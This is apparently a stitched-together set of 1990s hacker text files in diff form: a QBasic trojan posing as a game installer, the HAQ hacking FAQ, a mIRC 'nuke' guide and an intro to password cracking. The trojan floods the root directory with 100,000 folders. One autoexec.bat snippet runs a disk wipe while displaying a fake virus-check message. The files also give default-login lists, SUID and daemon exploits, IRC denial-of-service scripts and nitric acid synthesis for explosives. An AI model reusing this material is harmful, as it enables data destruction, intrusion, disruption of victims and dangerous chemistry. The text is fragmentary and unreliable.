AH=status, AL=number of sectors written flags, carry set if an error.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
SAMPLE OF A TROJAN
(from Spear)
This is a little trojan I wrote in Qbasic 4.5 It's a bitch!
REM bitch by Spear
color 14,0
print"installing datafiles... Please wait..."
print"This may take up to 20 minutes, depending on your computer..."
shell "cd\"
for a = 1 to 100000
a$=str$(a)
c$="md" + a$ + ".hee"
shell c$
next a
cls
print"Cybermattixx Version 1.0 is now installed on your system..."
print"Have a shitty day!"
print " ?AM?"
print
input "Hit ENTER To REBOOT your System now!";a$
shell "boot.com"
How to use it?
This can pose as the installation program for a game. This means that
when you upload it to a BBS or something, and post that it is a
kickass game, people will download it and try to install it on their
computers!
What does it do?
This program changes directory to the root and makes 100000 dirs in
the root. You cannot use deltree to wipe them out in one chunk and
you CANNOT get rid of them without doing reverse engineering on the
program, ie. rd instead of md. To get rid of them any other way you
would have to format c: or d:
+772
View File
@@ -0,0 +1,772 @@
_____________
/ / / *** *** ****** ******
/ *** *** ********* *********
/ / *** *** *** *** *** ***
/ / *********** *********** *** ***
/ /_____ ______ *********** *********** *** ** ***
/ / / /_____/ *** *** *** *** *** *****
/ / / / *** *** *** *** ***********
/ / / /______ *** *** *** *** ***** ***
+---------------+
| THE HAQ |
| Edition 2.07 |
| 11 JUN 1994 |
+---------------+
File 2 of 3
=====================================================================
VI. NEWBIES READ THIS
(Basic Hacking)
WHAT MAKES A SYSTEM SECURE?
(from alt.security FAQ)
"The only system which is truly secure is one which is switched off
and unplugged, locked in a titanium lined safe, buried in a concrete
bunker, and is surrounded by nerve gas and very highly paid armed
guards. Even then I wouldn't stake my life on it."
- originally from Gene Spafford
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WHAT WOULD BE IDEAL PROTECTION OF A SYSTEM?
Password Access- Get rid of simple passwords; routinely change all
passwords; regular review/monitoring of password
files
Physical Access- Lock up terminals, personal computers, disks when
not in use; eliminate unnecessary access lines;
disconnect modems when not in use
Other measures- Know who you are talking to; shred all documents;
avoid public domain software; report suspicious
activity (especially non-working hours access)
What this all means is that hackers must now rely on the ineptitude
and laziness of the users of the system rather than the ignorance
of SysOps. The SysOps and SecMans (Security Managers) are getting
smarter and keeping up to date. Not only that, but they are
monitoring the hack/phreak BBSes and publications. So the bottom
line is reveal nothing to overinquisitive newbies...they may be
working for the wrong side.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WHAT IS A FIREWALL?
(from the comp.security.misc FAQ)
A (Internet) firewall is a machine which is attached (usually)
between your site and a Wide Area Network (WAN). It provides
controllable filtering of network traffic, allowing restricted
access to certain Internet port numbers and blocks access to
pretty well everything else.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
HOW TO HACK WITHOUT GETTING INTO TROUBLE AND DAMAGING COMPUTERS?
1. Don't do damage intentionally.
2. Don't alter files other than than to hide your presence or to
remove traces of your intrusion.
3. Don't leave any real name, handle, or phone number on any
system.
4. Be careful who you share info with.
5. Don't leave your phone number with anyone you don't know.
6. Do NOT hack government computers.
7. Don't use codes unless you HAVE too.
8. Be paranoid!
9. Watch what you post on boards, be as general as possible.
10. Ask questions...but do it politely and don't expect to have
everything handed to you.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WHAT DO I DO IF I AM GETTING NOWHERE?
1. Change parity, data length, and stop bits. The system may not
respond to 8N1 (most common setting) but may respond to 7E1,8E2,
7S2, etc.
2. Change baud rates.
3. Send a series of carriage returns.
4. Send a hard break followed by a carriage return.
5. Send control characters. Work from ^a to ^z.
6. Change terminal emulation.
7. Type LOGIN, HELLO, LOG, ATTACH, CONNECT, START, RUN, BEGIN, GO,
LOGON, JOIN, HELP, or anything else you can think off.
=====================================================================
VII. Screwing with the most widespread operating system on the net
(UNIX / AIX Hacking)
WHAT ARE COMMON DEFAULT ACCOUNTS ON UNIX?
(from Belisarius)
Common default accounts are root, admin, sysadmin, unix, uucp, rje,
guest, demo, daemon, sysbin. These accounts may be unpassworded
or the password may possibly be the same (i.e. username uucp has
uucp as the passwd).
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
HOW IS THE UNIX PASSWORD FILE SETUP?
(from Belisarius)
The password file is usually called /etc/passwd
Each line of the passwd file of a UNIX system follows the following
format:
userid:password:userid#:groupid#:GECOS field:home dir:shell
What each of these fields mean/do---
userid -=> the userid name, entered at login and is what the
login searches the file for. Can be a name or a
number.
password -=> the password is written here in encrypted form.
The encryption is one way only. When a login
occurs the password entered is run through the
encryption algorithm (along with a salt) and then
contrasted to the version in the passwd file that
exists for the login name entered. If they match,
then the login is allowed. If not, the password is
declared invalid.
userid# -=> a unique number assigned to each user, used for
permissions
groupid# -=> similar to userid#, but controls the group the user
belongs to. To see the names of various groups
check /etc/group
GECOS FIELD -=> this field is where information about the user is
stored. Usually in the format full name, office
number, phone number, home phone. Also a good
source of info to try and crack a password.
home dir -=> is the directory where the user goes into
the system at (and usually should be brought
to when a cd is done)
shell -=> this is the name of the shell which is
automatically started for the login
Note that all the fields are separated by colons in the passwd file.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WHAT DO THOSE *s, !s, AND OTHER SYMBOLS MEAN IN THE PASSWD FILE?
(from Belisarius)
Those mean that the password is shadowed in another file. You have
to find out what file, where it is and so on. Ask somebody on your
system about the specifics of the Yellow Pages system, but
discretely!
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WHAT IS A UNIX TRIPWIRE?
(from Belisarius)
Tripwire is a tool for Unix admins to use to detect password cracker
activity, by checking for changed files, permissions, etc. Good for
looking for trojan horses like password stealing versions of
telnet/rlogin/ypcat/uucp/etc, hidden setuid files, and the like.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
USING SUID/GUID PROGS TO FULL ADVANTAGE.
(from Abort)
A SUID program is a program that when executed has the privs of the
owner.
A GUID has the privs of the group when executed.
Now imagine a few things (which happen often in reality):
1. Someone has a SUID program on their account, it happens to allow
a shell to, like @ or jump to a shell. If it does that, after you
execute said file and then spawn a shell off of it, all you do
in that shell has the privs of that owner.
2. If there is no way to get a shell, BUT they leave the file
writable, just write over it a script that spawns a shell, and you
got their privs again.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
HOW CAN I HACK INTO AN AIX MACHINE?
(from Prometheus)
If you can get access to the 'console' AIX machines have a security
hole where you can kill the X server and get a shell with
ctrl-alt-bkspce. Also by starting an xterm up from one you are not
logged in the utmp for that session because the xterms don't do utmp
logging as a default in AIX. Or try the usual UNIX tricks:
ftping /etc/passwd, tftping /etc/passwd, doing a finger and then
trying each of the usernames with that username as a password.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
HOW CAN I INCREASE MY DISK QUOTA ON UNIX?
(from Prometheus)
A UNIX disk quota may be increased by finding a directory on another
partition and using that. Find another user who wants more quota and
create a directory for the other to use, one that is world writable.
Once they've put their subdirectory in it, change the perms on the
directory to only read-execute. The reason this works is that
usually accounts are distributed across a couple of filesystems, and
admins are usually too lazy to give users the same quotas on each
filesystem. If the users are all on one filesystem, you may be able
to snag some space from one of the /usr/spool directories by creating
a 'hidden' subdirectory like .debug there, and using that.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
HOW CAN I FOOL AROUND ON XTERM / XWINDOWS?
(from Wildgoose)
Most x commands have a -display option which allows you to pick a
terminal to send to. So if you use bitmap to create a bitmap, or
download one, etc then:
xsetroot -bitmap bitmapname
[display the bitmap on your screen]
xsetroot -bitmap bitmapname -display xt2500:0
[display the bitmap on another xterm]
Other uses, try xterm -display xt??:0 will give someone else one of
your login windows to play with. They are then logged in as you
though, and can erase your filespace, etc. Beware!
Slightly irritating:
xclock -geom 1200x1200 -display xt??:0
[fills the entire screen with a clock]
Slightly more irritating:
Use a shell script with xsetroot to flash people's screens different
colors.
On the nastier side:
Use a shell script with xsetroot to kill a person's window manager.
Downright nasty:
Consult the man pages on xkill. It is possible to kill windows on
any display. So to log someone off an xterm you merely have to xkill
their login window.
Protect yourself:
If you use xhost - this will disable other people from being able
to log you out or generally access your terminal.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
HOW CAN I TAKE ADVANTAGE OF THE DECODE DAEMON?
(from Caustic)
First, you need to make sure that the decode daemon is active.
Check this by telnetting to the smtp port (usually port 25), and
expanding user Decode. If it gives you something, you can use it.
If it tells you that the user doesn't exist, or whatever, you can't.
If the daemon is active, this is how to exploit the decode daemon:
1) uuencode an echo to .rhosts
2) pipe that into mail, to be sent to the decode daemon
(What happens: the decode daemon (1st) decodes the process, but
leaves the bin priveleges resident. (2nd) the echo command is
executed, because now the decoded message assumes the bin priveleges
[which are *still* active, even though the daemon didn't issue the
command]).
3) If this is done right, you will be able to rlogin to the sysem.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
HOW CAN I GET THE PASSWORD FILE IF IT IS SHADOWED?
(from Belisarius)
If your system has Yellow Pages file managment:
ypcat /etc/passwd > whatever.filename
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
HOW IS A PASSWORD ENCRYPTED IN UNIX?
(from UNIX System Security[p.147])
Password encryption on UNIX is based on a modified version of
the DES [Data Encryption Standard]. Contrary to popular belief, the
typed password is not encrypted. Rather the password is used as the
key to encrypt a block of zero-valued bytes.
To begin the encryption, the first seven bits of each character
in the password are extracted to form the 56-bit key. This implies
that no more than eight characters are significant in a password.
Next, the E table is modified using the salt, which is the first two
characters of the encrypted password (stored in the passwd file).
The purpose of the salt is to makae it difficult to use hardware DES
chips or a precomputed list of encrypted passwords to attack the
algorithm. The DES algorithm (with the modified E table) is then
invoked for 25 iterations on the block of zeros. The output of this
encryption, which is 64 bits long, is then coerced into a
64-character alphabet (A-Z, a-z, 0-9, "." and "/"). Because this
coersion involves translations in which several different values are
represented by the same character, password encryption is essentially
one-way; the result cannot be decrypted.
=====================================================================
VIII. Screwing with the most secure operating system on the net
(VAX/VMS Hacking)
WHAT IS VAX/VMS?
VAX: Virtual Address eXtension. Computer is desisgned to use memory
addresses beyond the actual hardware and can therefore run progs
larger than physical memory. Developed by Digital Equipment
Corporation (DEC).
VMS: Virtual Memory System. Also developed by DEC.
DCL: Digital Command Language. Similar to DOS batch language or
UNIX script language.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WHAT ARE SOME OF THE DEFAULT VAX LOGINS?
Username Password
-------- --------
DECNET DECNET
DEFAULT DEFAULT
DEMO DEMO
unpassworded
FIELD FIELD
SERVICE
GUEST GUEST
unpassworded
OPERATOR OPERATOR
OPERATIONS OPERATIONS
SYSMAINT SYSMAINT
SERVICE
DIGITAL
SYSTEM SYSTEM
MANAGER
OPERATOR
SYSLIB
SYSTEST UETP
SYSTEST
SYSTEST_CLIG CLIG
SYSTEST
TEST
SUPPORT SUPPORT
DEC
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WHAT ARE SOME OF THE BASIC COMMANDS FROM THE "$" PROMPT?
@: executes a DCL program
usage- @filename.com
ACCOUNTING: program that tracks usage of the system by users
CREATE: PASCAL compiler
usage- CREATE filename.pas
CREATE/DIR: create a subdirectory
DEL: delete files
usage- DEL filename.ext
DIR: list the contents of a directory
options- /FULL = full listing with all security info
/BRIEF = brief listing
* = wildcard for anything
% = wildcard for a specific character
EDIT: VMS editor, requires VT-220 terminal
HELP: brings up help info
LOGOUT: obvious
MAIL: send E-mail locally and to any connected networks
$PASSWORD: change your password
usage- $PASSWORD newpassword
PHONE: chat program
usage- PHONE changes the prompt to a '%', from there type in
the username you wish to talk to. If the user is on a
different node then enter nodename::username
PHOTO: record session
RUN: execute an executable file
SHOW: lets you look at alot of different stuff
usage- SHOW option
options- CLUSTER = VAX cluster, if any
DEFAULT = directory path and device
DEVICES = system devices (drives, modems, etc.)
INTRUSION = accounts being hacked, if any
MEMORY = obvious
NETWORK = network name and VAX's location in it
PROCESS = PROCESS processname shows status
QUOTA = disk space available for account
SYSTEM = system info
DAY = obvious
TIME = obvious
USERS = online users
TYPE: display file on terminal (same as DOS 'type' and UNIX 'cat')
SET FILE/PROTECTION: sets the Read/Write/Execute/Delete flags
usage- SET FILE/PROTECTION=OWNER[RWED] filename.ext
options- WORLD, GROUP, or SYSTEM can be used in place of OWNER
WORLD = all users in your world
GROUP = all users in your group
SYSTEM = all users with SYSPRV privileges
SET TERMINAL: controls terminal settings
usage- SET TERMINAL/option
options- WIDTH=80 = set width to 80 columns
ADVANCED_VIDEO = selects 124x24 lines
NOADVANCED_VIDEO = unselects 124x24 lines
ANSI_CRT = selects ANSI escape sequences
NOANSI_CRT = unselects ANSI escape sequences
AUTOBAUD = allows computer to select highest possible
baud rate
NOAUTOBAUD = turn off automatic baud selection
BROADCAST = allows receipt of SEND, MAIL and PHONE
messages
NOBROADCAST = prevents receiption of SEND, MAIL and
PHONE messages
DEVICE_TYPE=VT220 = set terminal type to VT-220
ECHO = enables echoing from DCL command line
NOECHO = disable DCL command line echoing
FULLDUP = enable full duplex
NOFULLDUP = disable full duplex
HANGUP = log off if no carrier
NOHANGUP = don't log off even if no carrier
INQUIRE = show device type of terminal
PAGE=43 = set display length to 43 lines
TYPE_AHEAD = enable type ahead function
NOTYPE_AHEAD = disable type ahead function
UNKNOWN = use for ASCII device types
WRAP = set wrap around feature
NOWRAP = unset wrap around feature
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WHAT ARE COMMON VAX FILENAME EXTENSIONS?
COMPILER SOURCE CODE FILES
==========================
ADA = ADA compiler source code file
BAS = BASIC compiler source code file
B32 = BLISS-32 compiler source code file
C = C compiler source code file
COB = COBOL compiler source code file
FOR = FORTRAN compiler source code file
MAR = MACRO compiler source code file
PAS = PASCAL compiler source code file
PLI = PL/I compiler source code file
OBJ = object code created by compiler before linking
DCL LANGUAGE FILES
==================
CLD = DCL command description file
COM = DCL batch file
GENERAL FILES
=============
DAT = DATa file
DIR = subDIRectory file
EXE = EXEcutable program
HLP = text for HeLP libraries
LIS = system listing files (TYPE, PRINT, PHOTO)
LOG = batch job output
MEM = DSR output file
RNO = DSR source file
SIXEL = file for SIXEL graphics
SYS = SYStem image file
TJL = Trouble JournaL
TMP = TeMPorary file
TXT = text library input file
UAF = User Autorization File
MAIL FILES
==========
DIS = DIStribution file
MAI = MAIl message file
TXT = mail output file
EDT EDITOR FILES
================
EDT = command file for the EDT editor
JOU = EDT journal when problems occur
TPU = editor command file
=====================================================================
IX. Screwing with the most widespread operating system on PCs
(MS-DOS Hacks)
HOW TO REALLY **ERASE** A HARDDRIVE
(from Amarand)
Install a small program (in the Dos directory would be good) called
Wipe, by Norton Utilities. I am pretty sure that executing this
program, using the proper command line options, you can for one
better than formatting the hard drive. Wiping the information
changes each bit in the object (file, FAT, disk, hard drive) to a
zero...or a random bit, or an alternating bit instead of just
deleting the reference to it in the file allocation table. If you
just delete a file, or format a hard drive...with the new Dos you
would only need to let it run its course and then Unformat the drive.
Wipe, I have found, works much more effectively by first erasing the
file allocation table AFTER erasing the information the file
allocation table is used to find.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WRITING A .bat FILE TO 'WIPE' A DRIVE.
Add the following code to the end of autoexec.bat:
echo Please wait
echo Checking HardDisk for virii, this make take a while ...
wipe > nothing.txt
This prevents any output from Wipe being output.
=====================================================================
X. Finding out what that encrypted info is
(Cracking programs)
WHAT ARE PASSWORD CRACKING PROGRAMS?
(from Belisarius)
There are three main cracking programs. They are Crack, Cracker Jack
and Cops. The latest versions are 4.1 for Crack and 1.4 for Cracker
Jack. Crack and COPS run on UNIX and CJack runs on a PC. CJack1.3
runs on any x86 class and CJack1.4 needs at least a 386. To use any
of these requires access to an unshadowed password file.
They are not programs that try to login to an account. They take the
password file (/etc/passwd in UNIX is usually the name) and guess the
passwords.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WHERE CAN I GET THESE PROGRAMS?
Crack: ftp.virginia.edu /pub/security
CrackerJack: bnlux1.bnl.gov /pub/pezz
COPS:
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WHAT IS WPCRACK?
WPCRAK is a cracker to break the encryption on WordPerfect files.
It works, but takes a long time to run.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WHAT IS PKCRACK?
PKCRACK is a dictionary cracker for PKZIP. It works. It's
dictionary, but it works. Not all that well, as you may have to sift
through multiple possible passwords, but its better than nothing.
=====================================================================
XI. How do I keep my info secure
(PGP / Cryptology)
WHAT IS PGP?
(from Belisarius)
PGP stands for Pretty Good Protection, from a company called Pretty
Good Software. It is a public key encryption program for MS-DOS,
Unix, and Mac. You create a key pair. One private (secret) key
and a public key. The keys are different parts of the whole. I
distribute my public key and anyone who wants can grab it ad it to
their PGP keyring. Then when they want to send me a message they
encrypt it with PGP and my public key and then send it. Only I can
decrypt it because you need my secret key to decode it. (Trust me
you won't get my secret key) That is PGP. Please use it if you
want to communicate anything of a ahhhh....sensitive manner.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WHERE CAN I GET PGP?
(from an archie search)
FTP sites for PGP=Pretty Good Privacy Public Encryption System
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
========
Unix PGP
========
Host 130.149.17.7
Location: /pub/local/ini/security
FILE -rw-rw-r-- 651826 Apr 5 1993 pgp22.tar.Z
Host arthur.cs.purdue.edu
Location: /pub/pcert/tools/unix/pgp
FILE -r--r--r-- 651826 Mar 7 1993 pgp22.tar.Z
Host coombs.anu.edu.au
Location: /pub/security/cypher
FILE -r--r--r-- 651826 Nov 4 22:28 pgp22.tar.Z
==========
MS-DOS PGP
==========
Host zero.cypher.com
Location: /pub/pgp
FILE pgp23a.zip
================
MS-DOS PGP SHELL
================
Host athene.uni-paderborn.de
Location: /pcsoft/msdos/security
FILE -rw-r--r-- 65160 Aug 9 20:00 pgpshe22.zip
Host nic.switch.ch
Location: /mirror/msdos/security
FILE -rw-rw-r-- 65160 Aug 9 22:00 pgpshe22.zip
Host plains.nodak.edu
Location: /pub/aca/msdos/pgp
FILE -rw-r--r-- 65430 Nov 26 18:28 pgpshe22.zip
=======
Mac PGP
=======
Host plaza.aarnet.edu.au
Location: /micros/mac/info-mac/util
FILE -r--r--r-- 323574 Apr 26 1993 pgp.hqx
Host sics.se
Location: /pub/info-mac/util
FILE -rw-rw-r-- 323574 Nov 5 11:20 pgp.hqx
Host sumex-aim.stanford.edu
Location: /info-mac/util
FILE -rw-r--r-- 323574 Apr 26 1993 pgp.hqx
=====================================================================
XII. Chemistry 101
(explosive/pyrotechnic component prep)
XIII. Fun things with solder, wires, and parts
(Underground electronics)
XIV. Watching television
(cable, Pay-Per-View(PPV), scrambling)
XV. What's on the radio waves?
(Radios and Scanning)
HOW TO MAKE NITRIC ACID:
(from Neurophire)
Nitric acid is not TOO expensive, but is hard to find except from
chemical supply houses. Purchases can be traced.(From TBBOM13.TXT)
There are several ways to make this most essential of all acids for
explosives. One method by which it could be made will be presented.
again, be reminded that these methods SHOULD NOT BE CARRIED OUT!!
Materials: Equipment:
---------- ----------
sodium nitrate or adjustable heat source
potassium nitrate
retort
distilled water
ice bath
concentrated
sulfuric acid stirring rod
collecting flask with
stopper
1) Pour 32 milliliters of concentrated sulfuric acid into the retort.
2) Carefully weigh out 58 grams of sodium nitrate, or 68 grams of
potassium nitrate. and add this to the acid slowly. If it all does
not dissolve, carefully stir the solution with a glass rod until
it does.
3) Place the open end of the retort into the collecting flask, and
place the collecting flask in the ice bath.
4) Begin heating the retort, using low heat. Continue heating until
liquid begins to come out of the end of the retort. The liquid that
forms is nitric acid. Heat until the precipitate in the bottom of
the retort is almost dry, or until no more nitric acid is forming.
CAUTION: If the acid is heated too strongly, the nitric acid will
decompose as soon as it is formed. This can result in the
production of highly flammable and toxic gasses that may explode.
It is a good idea to set the above apparatus up, and then get away
from it.
Potassium nitrate could also be obtained from store-bought black
powder, simply by dissolving black powder in boiling water and
filtering out the sulfur and charcoal. To obtain 68 g of potassium
nitrate, it would be necessary to dissolve about 90 g of black powder
in about one liter of boiling water. Filter the dissolved solution
through filter paper in a funnel into a jar until the liquid that
pours through is clear. The charcoal and sulfur in black powder are
insoluble in water, and so when the solution of water is allowed to
evaporate, potassium nitrate will be left in the jar.
=====================================================================
XIII. Fun things with solder, wires, and parts
(Underground electronics)
HOW TO MAKE HIGH FREQUENCY TONES TO ANNOY SOMEONE?
(from Angel of Death with Belisarius)
The idea is to make a simple timing circuit to create a high freq
tone. The timing circuit is based upon the 555-chip and uses a
simple speaker to convert the pulses from the 555 into sound.
Required materials: 555 timer chip, 9 V battery, .01 uF capacitor,
100k potentiometer, tweeter speaker, wire
(the capacitor and resistor values can vary
although that changes the possible freqs)
-9V (GND)
[\ |
[s\ | ________ ________
[p \ | | \/ |
[e +-------+-------------------+--| 1 8 |-- +9V
[a | | | |
[k | | | /.01uF CAP | 5 |
[e +-+ +--|(------+-----------| 2 5 7 |
[r / | | \ | | 5 |
[ / | | | |
[/ +--------------- | ----------| 3 t 6 |----+
| | | i | |
| | | m | |
| | +9V --| 4 e 5 | |
| | | r | |
| | |__________________| |
| | |
| /\ | |
+----\ / \-----+-----------------------------------+
\/ 100k POT
555 Timer Pin Connections
-------------------------
Pin 1: Ground (-9V side of bat), one lead of tweeter, one lead
of capacitor
Pin 2: Pin 6 and other lead of capacitor
Pin 3: Other lead of the tweeter, one lead of the resistor
Pin 4: Pin 8 and the +9V
Pin 5: No connections
Pin 6: Pin 2 and the other lead of the potentiometer
Pin 7: No connections
Pin 8: Pin 4 and the +9V
=====================================================================
XIV. Watching television
(cable, Pay-Per-View(PPV), scrambling)
HOW IS CABLE TV SCRAMBLED?
(from Aero)
There are three main types of scrambling for cable TV: trap filters,
gernaral scrambling and addressable scrambling.
1. Trap filters. Located in the distribution box and physically
prevent the desired channel from reaching your house. All you see
when this techniques is used is theoretically static (i.e. a blank
channel). No filter is perfect, so some signal may reach your TV.
This is an older system of cable protection, and it is easy to bypass
(go out to the box and remove the filter).
2. General scrambling. This system scrambles the pay channels (all
the channels before they reach the box), and you need a special
decoder to unscramble them. The most common method of scambling is
to remove the sync signal. This is also easy to get around as you
can buy descramblers.
3. Addressable descramblers. The cable box receives the scrambled
channels, but the cable company sends signals to the box telling it
which ones should be unscrambled. This is the system used by most
pay-per-view systems. This is a little harder to defeat, but not too
bad if you have the right equipment/friends.
File diff suppressed because it is too large Load Diff
+104
View File
@@ -0,0 +1,104 @@
//------------------------------------------------\\
|| How to Hexedit mIRC - Flood Protection/Nuking ||
|| By: Lord Somer(webmaster@lordsomer.com) ||
|| ||
|| The Hackers Layer ||
|| http://www.lordsomer.com ||
|| ||
\\------------------------------------------------//
Flood Protection
1.Get Rid of Version/User Floods
Using a hex editor open mIRC.exe.
Search for Reply.
Find where the replies are.
Simply delete all the replys, except for the ping reply.
How to Nuke
There are several ways and versions of nukes but the most common is the simple wnuke nuke.
It just disconnects the user from the server, so that's what a connection reset by peer
means! I'll cover the wnukes first then the other types of nukes
The 2 types of WNukes
1.WNUKE 4 From a Popup Nuke
Download WNUKE4.EXE
Add these pieces of coding to the appropriate portions of mIRC.
[POPUPS/NICK NAMES LIST]
NUKE!:/mn $1 $2 $3 $4 $5 $6 $7
[ALIASES]
mn {
.nuke $$1
timer 1 3 /nuke $$2
timer 1 6 /nuke $$3
timer 1 9 /nuke $$4
timer 1 12 /nuke $$5
timer 1 15 /nuke $$6
timer 1 18 /nuke $$7
}
/nuke {
enable #nuke
set %nuke.nick $1
stats L $1
whois $1
timer 1 2 /src
}
[RAW]
#nuke disabled
311:*: set %nukeip $parm4 | halt
312:*: set %nukeserver $parm3 | halt
301:*: halt
313:*: halt
319:*: halt
317:*: halt
318:*: run $mircdir $+ \wnuke4.exe -n %nukeserver %nukeip 0 1200-3500 %nukeport | .disable #nuke | echo 6 Nuking %nukeip on %nukeserver %nukeport $+ . | halt
#nuke end
2.WNewk Via a Seperate Program
1.Pick Your Weapon
1.wnuke.exe
2.wnuke2.exe
3.wnuke4.exe RECOMMENDED
4.dccnewk.exe
5.pnewq97o.exe
6.snuke.exe
7.wnewk.exe
8.wnewk-x.exe
9.wnewk-x2.exe RECOMMENDED
2.The below options refer to a bit of code and here it is:
[POPUPS/NICKNAMES LIST]
Nuke
.DNS:/dns *1
.Run Nuker:/run $mircdir $+ utils\nukers\wnewk-x2.exe
.Whois:/whois *1
This is based on the fact your nuker is in a sub-dir of utils called nukers.
3.Run Your weapon of choice in this case wnewk-x2.exe or of course increase your
script by adding in the bit of code.
4.Now do a /dns on the enemy or you could add the bit of code to your script.
5.Now do a /whois on the enemy or you could add the bit of code to your script.
6.Look in your status window, highlight the outputted ip address and server
of your victim and hit crtl+c(seperate copy for each, these are placed in the config more
info in next step).
7.Configure the script:
Server: paste the server from the status window here
Destination address: paste the ip of the victim from the status window here.
Hit engage newk and watch in the channel for a:CONNECTION RESET BY PEER
If it dosen't work increase the rang of ports, do a /links and pick a different
server to try going through, or try a different unreach to use.
+163
View File
@@ -0,0 +1,163 @@
|+=================================+|
||*********************************||
||* Introduction to Hacking *||
||* by KwAnTAM_PoZeEtroN *||
||*********************************||
|+=================================+|
The first part of any hacking expidition is getting into the system
that you plan to 'explore.' This can be achieved in any number of
ways. The main two are:
1) Cracking passwd (brute force)
2) Using an exploit
Cracking passwd is fairly simple. You get a 'cracking' program which
is designed to take each word in a word list file and encrypt it
using the same one-way hash that UNIX uses to encrypt its password
file. Then it compares the hashed value to each password in the
encrypted list, which is found on UNIX and other *IX systems in the
file /etc/passwd Word lists and cracking programs are available at
http://kwantam.home.ml.org
The list of words used is called a dictionary file. It contains a
series of words, one per line, in a standard ASCII text file. An
excerpt from a dictionary file could be
helix
hell
hellacious
hello
hellbender
hellbent
hell-bent
hellbox
hellcat
hellebore
heller
hell-for-leather
hellgrammite
etc.
The one-way hash function is a small series of mathematical steps
that makes a series of characters which is saved in the passwd file.
The one-way hash function UNIX uses is a variant of Crypt(3). The reason
that a dictionary file is needed is the fact that the Crypt(3) function
cannot be reversed, hence the name one-way hash. It is mathematically
infeasible to find in any amount of time the string of characters from
which the hash value came.
The passwd file is a series of lines, each with user info on it. An
example is:
joeschmoe:naVwowMManasMMo:10:200:Joe Schmoe:/users/joeschmoe:/bin/bash
^ ^ ^ ^ ^ ^ ^
| | | | | | +- User's
| | | | | | shell program
| | | | | +---- User's home directory
| | | | +----------------- User's real name
| | | +------------------------- User number
| | +----------------------------- User's group number
| +--------------------------------------- Hash of user's password
+--------------------------------------------------- Username
I will explain each of these:
- Username is the name under which the user logs in. Usually this is
accomplished by typing in the username at the username prompt and then
the password at the password prompt.
- Hash of user's password is the target of the cracking method. This is
what the hash of each word in the dictionary file is compared to.
- User's group number determines things such as access to certain files,
etc. Used more in the exploit technique
- User's number is basically identification for the system.
- User's real name is the name the user entered. Not used by the system,
but it provides a handy human-readable id of each user.
- User's home directory is the directory that they go to when they log
into the system.
- User's shell is the user interface that the user uses. Shells include
/bin/bash /bin/ash /bin/tcsh /bin/csh and /bin/sh
It is not necessary to modify the passwd file to contain only the passwords
because most cracking programs look for the second field, which is indicated
by the colon (:) seperating it from the username.
As you can see, it is also possible that, if the user's password is not
in the dictionary file, the cracker won't find the password to that
username. However, on a system of 200 users, at least 70 of them will
usually have passwords that are in dictionaries, depending on if the
system administrator checks the passwords or not and the type of user
that accesses the system most. A server used by computer security experts
will not be nearly as susceptible to this kind of an attack (or any, for
that matter) as one which is used by average people for e-mail and internet
access.
The second kind of attack, the exploit, is a more difficult one, but it
usually has greater rewards, including the possiblity of getting total
control of the system. Exploits work by using a piece of software in
such a way as to compromise the security of the system. One of the most
popular programs to use in this way is sendmail. Sendmail is most
susceptible because it must be open to public access to allow mail to be
transferred into and out of the system. Usually a buffer, an area in
memory where the system stores program information, is overwritten using
sendmail. The experienced hacker can transfer his own program code into
the buffer so that while the system thinks it is simply running the mail
retriever it is actually copying a shell program into a public access
